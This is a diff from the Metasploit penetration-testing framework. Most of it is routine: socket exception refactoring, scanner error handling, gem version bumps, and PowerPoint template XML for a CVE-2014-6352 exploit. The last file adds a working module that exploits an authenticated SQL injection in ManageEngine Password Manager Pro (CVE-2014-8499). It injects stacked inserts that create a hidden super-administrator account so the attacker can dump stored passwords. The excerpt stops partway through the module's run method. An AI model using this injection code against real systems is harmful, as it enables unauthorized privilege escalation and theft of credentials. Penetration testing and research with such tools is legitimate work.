lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="picTx" preserve="1"><p:cSld name="Picture with Caption"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="4800600"/><a:ext cx="5486400" cy="566738"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="2000" b="1"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Picture Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="pic" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="612775"/><a:ext cx="5486400" cy="4114800"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="3200"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="2800"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="2400"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl9pPr></a:lstStyle><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Text Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="5367338"/><a:ext cx="5486400" cy="804862"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="1400"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1200"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1000"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.wmf"/></Relationships>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}"/>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:viewPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:normalViewPr><p:restoredLeft sz="15620"/><p:restoredTop sz="94660"/></p:normalViewPr><p:slideViewPr><p:cSldViewPr><p:cViewPr varScale="1"><p:scale><a:sx n="57" d="100"/><a:sy n="57" d="100"/></p:scale><p:origin x="-1242" y="-522"/></p:cViewPr><p:guideLst><p:guide orient="horz" pos="2160"/><p:guide pos="2880"/></p:guideLst></p:cSldViewPr></p:slideViewPr><p:notesTextViewPr><p:cViewPr><p:scale><a:sx n="100" d="100"/><a:sy n="100" d="100"/></p:scale><p:origin x="0" y="0"/></p:cViewPr></p:notesTextViewPr><p:gridSpacing cx="76200" cy="76200"/></p:viewPr>

lib/metasploit/framework/login_scanner/ftp.rb

@@ -41,7 +41,7 @@ module Metasploit
 
           begin
             success = connect_login(credential.public, credential.private)
-          rescue ::EOFError, Errno::ECONNRESET,  Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
+          rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
             result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
             success = false
           end

lib/metasploit/framework/login_scanner/telnet.rb

@@ -92,7 +92,7 @@ module Metasploit
               end
 
             end
-          rescue ::EOFError, Errno::ECONNRESET,  Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
+          rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
             result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
           end
 

lib/msf/core/auxiliary/rservices.rb

@@ -35,7 +35,7 @@ module Auxiliary::RServices
       begin
         sd = connect(true, { 'CPORT' => cport })
 
-      rescue Rex::AddressInUse
+      rescue Rex::BindFailed
         # Ignore and try again
         #vprint_error("Unable to connect: #{$!}")
 

lib/msf/core/auxiliary/scanner.rb

@@ -57,6 +57,7 @@ def run
 
   threads_max = datastore['THREADS'].to_i
   @tl = []
+  @scan_errors = []
 
   #
   # Sanity check threading given different conditions
@@ -87,17 +88,22 @@ def run
   begin
 
   if (self.respond_to?('run_range'))
-    # No automated progress reporting for run_range
+    # No automated progress reporting or error handling for run_range
     return run_range(datastore['RHOSTS'])
   end
 
   if (self.respond_to?('run_host'))
 
-    @tl = []
-
     loop do
+      # Stop scanning if we hit a fatal error
+      break if has_fatal_errors?
+
       # Spawn threads for each host
       while (@tl.length < threads_max)
+
+        # Stop scanning if we hit a fatal error
+        break if has_fatal_errors?
+
         ip = ar.next_ip
         break if not ip
 
@@ -108,6 +114,10 @@ def run
 
           begin
             nmod.run_host(targ)
+          rescue ::Rex::BindFailed
+            if datastore['CHOST']
+              @scan_errors << "The source IP (CHOST) value of #{datastore['CHOST']} was not usable"
+            end
           rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error, ::EOFError
           rescue ::Interrupt,::NoMethodError, ::RuntimeError, ::ArgumentError, ::NameError
             raise $!
@@ -120,6 +130,9 @@ def run
         end
       end
 
+      # Stop scanning if we hit a fatal error
+      break if has_fatal_errors?
+
       # Exit once we run out of hosts
       if(@tl.length == 0)
         break
@@ -139,6 +152,7 @@ def run
       scanner_show_progress() if @show_progress
     end
 
+    scanner_handle_fatal_errors
     return
   end
 
@@ -153,10 +167,12 @@ def run
 
     ar = Rex::Socket::RangeWalker.new(datastore['RHOSTS'])
 
-    @tl = []
-
     while(true)
       nohosts = false
+
+      # Stop scanning if we hit a fatal error
+      break if has_fatal_errors?
+
       while (@tl.length < threads_max)
 
         batch = []
@@ -178,6 +194,10 @@ def run
             mybatch = bat.dup
             begin
               nmod.run_batch(mybatch)
+          rescue ::Rex::BindFailed
+            if datastore['CHOST']
+              @scan_errors << "The source IP (CHOST) value of #{datastore['CHOST']} was not usable"
+            end
             rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error
             rescue ::Interrupt,::NoMethodError, ::RuntimeError, ::ArgumentError, ::NameError
               raise $!
@@ -197,6 +217,9 @@ def run
         end
       end
 
+      # Stop scanning if we hit a fatal error
+      break if has_fatal_errors?
+
       # Exit if there are no more pending threads
       if (@tl.length == 0)
         break
@@ -218,6 +241,7 @@ def run
       scanner_show_progress() if @show_progress
     end
 
+    scanner_handle_fatal_errors
     return
   end
 
@@ -240,12 +264,33 @@ def seppuko!
   end
 end
 
+def has_fatal_errors?
+  @scan_errors && !@scan_errors.empty?
+end
+
+def scanner_handle_fatal_errors
+  return unless has_fatal_errors?
+  return unless @tl
+
+  # First kill any running threads
+  @tl.each {|t| t.kill if t.alive? }
+
+  # Show the unique errors triggered by the scan
+  uniq_errors = @scan_errors.uniq
+  uniq_errors.each do |emsg|
+    print_error("Fatal: #{emsg}")
+  end
+  print_error("Scan terminated due to #{uniq_errors.size} fatal error(s)")
+end
+
 def scanner_progress
   return 0 unless @range_done and @range_count
   pct = (@range_done / @range_count.to_f) * 100
 end
 
 def scanner_show_progress
+  # it should already be in the process of shutting down if there are fatal errors
+  return if has_fatal_errors?
   pct = scanner_progress
   if pct >= (@range_percent + @show_percent)
     @range_percent = @range_percent + @show_percent

lib/msf/core/db_manager/import.rb

@@ -302,6 +302,9 @@ module Msf::DBManager::Import
         when /MetasploitV4/
           @import_filedata[:type] = "Metasploit XML"
           return :msf_xml
+        when /MetasploitV5/
+          @import_filedata[:type] = "Metasploit XML"
+          return :msf_xml
         when /netsparker/
           @import_filedata[:type] = "NetSparker XML"
           return :netsparker_xml

lib/rex/exceptions.rb

@@ -213,25 +213,57 @@ class ConnectionTimeout < ConnectionError
   end
 end
 
+###
+#
+# This connection error is raised when an attempt is made to connect
+# to a broadcast or network address.
+#
+###
+class InvalidDestination < ConnectionError
+  include SocketError
+  include HostCommunicationError
+
+  def to_s
+    "The destination is invalid: #{addr_to_s}."
+  end
+end
 
 ###
 #
 # This exception is raised when an attempt to use an address or port that is
-# already in use occurs, such as binding to a host on a given port that is
-# already in use.  Note that Windows raises this in some cases when attempting
-# to connect to addresses that it can't handle, e.g. "0.0.0.0".  Thus, this is
-# a ConnectionError.
+# already in use or onot available occurs. such as binding to a host on a
+# given port that is already in use, or when a bind address is specified that
+# is not available to the host.
 #
 ###
+class BindFailed < ::ArgumentError
+  include SocketError
+  include HostCommunicationError
+
+  def to_s
+    "The address is already in use or unavailable: #{addr_to_s}."
+  end
+end
+
+##
+#
+# This exception is listed for backwards compatibility. We had been
+# using AddressInUse as the exception for both bind errors and connection
+# errors triggered by connection attempts to broadcast and network addresses.
+# The two classes above have split this into their respective sources, but
+# callers may still expect the old behavior.
+#
+##
 class AddressInUse < ConnectionError
   include SocketError
   include HostCommunicationError
 
   def to_s
-    "The address is already in use #{addr_to_s}."
+    "The address is already in use or unavailable: #{addr_to_s}."
   end
 end
 
+
 ###
 #
 # This exception is raised when an unsupported internet protocol is specified.

lib/rex/post/meterpreter/ui/console.rb

@@ -106,7 +106,7 @@ class Console
       log_error("Operation timed out.")
     rescue RequestError => info
       log_error(info.to_s)
-    rescue Rex::AddressInUse => e
+    rescue Rex::InvalidDestination => e
       log_error(e.message)
     rescue ::Errno::EPIPE, ::OpenSSL::SSL::SSLError, ::IOError
       self.client.kill

lib/rex/socket/comm/local.rb

@@ -195,7 +195,7 @@ class Rex::Socket::Comm::Local
 
       rescue ::Errno::EADDRNOTAVAIL,::Errno::EADDRINUSE
         sock.close
-        raise Rex::AddressInUse.new(param.localhost, param.localport), caller
+        raise Rex::BindFailed.new(param.localhost, param.localport), caller
       end
     end
 
@@ -295,7 +295,7 @@ class Rex::Socket::Comm::Local
 
         rescue ::Errno::EADDRNOTAVAIL,::Errno::EADDRINUSE
           sock.close
-          raise Rex::AddressInUse.new(ip, port), caller
+          raise Rex::InvalidDestination.new(ip, port), caller
 
         rescue Errno::ETIMEDOUT
           sock.close

lib/rex/ui/text/output/file.rb

@@ -14,8 +14,8 @@ class Output::File < Rex::Ui::Text::Output
 
   attr_accessor :fd
 
-  def initialize(path)
-    self.fd = ::File.open(path, "wb")
+  def initialize(path, mode='wb')
+    self.fd = ::File.open(path, mode)
   end
 
   def supports_color?

metasploit-framework-db.gemspec

@@ -31,7 +31,7 @@ Gem::Specification.new do |spec|
 
   spec.add_runtime_dependency 'activerecord', rails_version_constraint
   # Metasploit::Credential database models
-  spec.add_runtime_dependency 'metasploit-credential', '~> 0.13.0'
+  spec.add_runtime_dependency 'metasploit-credential', '~> 0.13.3'
   # Database models shared between framework and Pro.
   spec.add_runtime_dependency 'metasploit_data_models', '~> 0.21.1'
   # depend on metasploit-framewrok as the optional gems are useless with the actual code

metasploit-framework.gemspec

@@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 0.28.0'
   # Needed for Meterpreter on Windows, soon others.
-  spec.add_runtime_dependency 'meterpreter_bins', '0.0.10'
+  spec.add_runtime_dependency 'meterpreter_bins', '0.0.11'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

modules/auxiliary/admin/http/manageengine_pmp_privesc.rb

@@ -0,0 +1,328 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection',
+      'Description' => %q{
+        ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection
+        vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate
+        privileges and obtain Super Administrator access. A Super Administrator can then
+        use his privileges to dump the whole password database in CSV format. PMP can use
+        both MySQL and PostgreSQL databases but this module only exploits the latter as
+        MySQL does not support stacked queries with Java. PostgreSQL is the default database
+        in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,
+        so a higher version does not guarantee exploitability. This module has been tested
+        on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in
+        v7.1 build 7105 and above.
+      },
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'CVE', '2014-8499' ],
+          [ 'OSVDB', '114485' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ]
+        ],
+      'DisclosureDate' => 'Nov 8 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(7272),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptString.new('USERNAME', [true, 'The username to login as', 'guest']),
+        OptString.new('PASSWORD', [true, 'Password for the specified username', 'guest']),
+        OptString.new('TARGETURI', [ true,  "Password Manager Pro application URI", '/'])
+      ], self.class)
+  end
+
+
+  def login(username, password)
+    # 1st step: we obtain a JSESSIONID cookie...
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc')
+    })
+
+    if res && res.code == 200
+      # 2nd step: we try to get the ORGN_NAME and AUTHRULE_NAME from the page (which is only needed for the MSP versions)
+      if res.body && res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/
+        orgn_name = $1
+      else
+        orgn_name = nil
+      end
+
+      if res.body && res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/
+        authrule_name = $1
+      else
+        authrule_name = nil
+      end
+
+      # 3rd step: we try to get the domainName for the user
+      cookie = res.get_cookies
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'login', 'AjaxResponse.jsp'),
+        'ctype' => "application/x-www-form-urlencoded",
+        'cookie' => cookie,
+        'vars_get' => {
+          'RequestType' => 'GetUserDomainName',
+          'userName' => username
+        }
+      })
+      if res && res.code == 200 && res.body
+        domain_name = res.body.to_s.strip
+      else
+        domain_name = nil
+      end
+
+      # 4th step: authenticate to j_security_check, follow the redirect to PassTrixMain.cc and get its cookies.
+      # For some reason send_request_cgi! doesn't work, so follow the redirect manually...
+      vars_post = {
+        'j_username'    => username,
+        'username'      => username,
+        'j_password'    => password
+      }
+      vars_post['ORGN_NAME'] = orgn_name if orgn_name
+      vars_post['AUTHRULE_NAME'] = authrule_name if authrule_name
+      vars_post['domainName'] = domain_name if domain_name
+
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'j_security_check;' + cookie.to_s.gsub(';','')),
+        'ctype' => "application/x-www-form-urlencoded",
+        'cookie' => cookie,
+        'vars_post' => vars_post
+      })
+      if res && res.code == 302
+        res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc'),
+          'cookie' => cookie,
+        })
+
+        if res && res.code == 200
+          # 5th step: get the c ookies sent in the last response
+          return res.get_cookies
+        end
+      end
+    end
+    return nil
+  end
+
+
+  def inject_sql(old_style)
+    # On versions older than 7000 the injection is slightly different (we call it "old style").
+    # For "new style" versions we can escalate to super admin by doing
+    # "update aaaauthorizedrole set role_id=1 where account_id=#{user_id};insert into ptrx_superadmin values (#{user_id},true);"
+    # However for code simplicity let's just create a brand new user which works for both "old style" and "new style" versions.
+    if old_style
+      sqli_prefix = '\\\'))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") as ' + Rex::Text.rand_text_alpha_lower(rand(8)+3) + ";"
+    else
+      sqli_prefix = '\\\'))))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") AS Ptrx_DummyPwds GROUP BY "PTRX_RID","PTRX_RNAME","PTRX_DESC","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24") as ' + Rex::Text.rand_text_alpha_lower(rand(8)+3) + ";"
+    end
+
+    user_id = Rex::Text.rand_text_numeric(4)
+    time = Rex::Text.rand_text_numeric(8)
+    username = Rex::Text.rand_text_alpha_lower(6)
+    username_chr = ""
+    username.each_char do |c|
+       username_chr << 'chr(' << c.ord.to_s << ')||'
+    end
+    username_chr.chop!.chop!
+
+    password = Rex::Text.rand_text_alphanumeric(10)
+    password_chr = ""
+    password.each_char do |c|
+       password_chr << 'chr(' << c.ord.to_s << ')||'
+    end
+    password_chr.chop!.chop!
+
+    group_chr = ""
+    'Default Group'.each_char do |c|
+       group_chr << 'chr(' << c.ord.to_s << ')||'
+    end
+    group_chr.chop!.chop!
+
+    sqli_command =
+     "insert into aaauser values (#{user_id},$$$$,$$$$,$$$$,#{time},$$$$);" +
+     "insert into aaapassword values (#{user_id},#{password_chr},$$$$,0,2,1,#{time});" +
+     "insert into aaauserstatus values (#{user_id},$$ACTIVE$$,#{time});" +
+     "insert into aaalogin values (#{user_id},#{user_id},#{username_chr});" +
+     "insert into aaaaccount values (#{user_id},#{user_id},1,1,#{time});" +
+     "insert into aaaauthorizedrole values (#{user_id},1);" +
+     "insert into aaaaccountstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});" +
+     "insert into aaapasswordstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});" +
+     "insert into aaaaccadminprofile values (#{user_id},$$" + Rex::Text.rand_text_alpha_upper(8) + "$$,-1,-1,-1,-1,-1,false,-1,-1,-1,$$$$);" +
+     "insert into aaaaccpassword values (#{user_id},#{user_id});" +
+     "insert into ptrx_resourcegroup values (#{user_id},3,#{user_id},0,0,0,0,#{group_chr},$$$$);" +
+     "insert into ptrx_superadmin values (#{user_id},true);"
+    sqli_suffix = "-- "
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, "SQLAdvancedALSearchResult.cc"),
+      'cookie'    => @cookie,
+      'vars_post'  => {
+        'COUNT'          => Rex::Text.rand_text_numeric(2),
+        'SEARCH_ALL'     => sqli_prefix + sqli_command + sqli_suffix,
+        'USERID'         => Rex::Text.rand_text_numeric(4)
+      }
+    })
+
+    return [ username, password ]
+  end
+
+
+  def get_version
+    res = send_request_cgi({
+      'uri' => normalize_uri("PassTrixMain.cc"),
+      'method' => 'GET'
+    })
+    if res && res.code == 200 && res.body &&
+        res.body.to_s =~ /ManageEngine Password Manager Pro/ &&
+        (
+          res.body.to_s =~ /login\.css\?([0-9]+)/ ||                            # PMP v6
+          res.body.to_s =~ /login\.css\?version=([0-9]+)/ ||                    # PMP v6
+          res.body.to_s =~ /\/themes\/passtrix\/V([0-9]+)\/styles\/login\.css"/ # PMP v7
+        )
+      return $1.to_i
+    else
+      return 9999
+    end
+  end
+
+
+  def check
+    version = get_version
+    case version
+      when 0..7104
+        return Exploit::CheckCode::Appears
+      when 7105..9998
+        return Exploit::CheckCode::Safe
+      else
+        return Exploit::CheckCode::Unknown
+    end
+  end
+
+
+  def run
+    unless check == Exploit::CheckCode::Appears
+      print_error("#{peer} - Fingerprint hasn't been successful, trying to exploit anyway...")
+    end
+
+    version = get_version
+    @cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
+    if @cookie == nil
